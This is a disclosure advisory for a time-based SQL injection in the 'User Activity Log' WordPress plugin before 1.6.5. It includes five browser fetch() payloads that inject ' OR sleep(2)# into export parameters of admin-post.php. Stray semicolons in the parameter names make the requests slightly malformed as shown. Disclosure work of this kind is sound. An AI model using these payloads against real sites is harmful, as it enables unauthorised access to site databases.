User Activity Log < 1.6.5 - Unauthenticated SQLi

Description The plugin does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks. Version 1.6.4 mitigates the issue for unauthenticated users but it is still exploitable by Subscribers and above.

PoC

Run any of the following fetch commands in a browser window and notice that they take several seconds to complete, demonstrating the SQL Injection vulnerability. await fetch( ‘/wp-admin/admin-post.php?export=user_logs&export-nonce;=abc&userrole;=abc%22+OR+sleep(2)%23+’ ); await fetch( ‘/wp-admin/admin-post.php?export=user_logs&export-nonce;=abc&username;=abc%27+OR+sleep(2)%23+’ ); await fetch( ‘/wp-admin/admin-post.php?export=user_logs&export-nonce;=abc&type;=abc%27+OR+sleep(2)%23+’ ); await fetch( ‘/wp-admin/admin-post.php?export=user_logs&export-nonce;=abc&txtsearch;=abc%27+OR+sleep(2)%23+’ ); await fetch( ‘/wp-admin/admin-post.php?export=user_logs&export-nonce;=abc&showip;=abc%27+OR+sleep(2)%23+’ );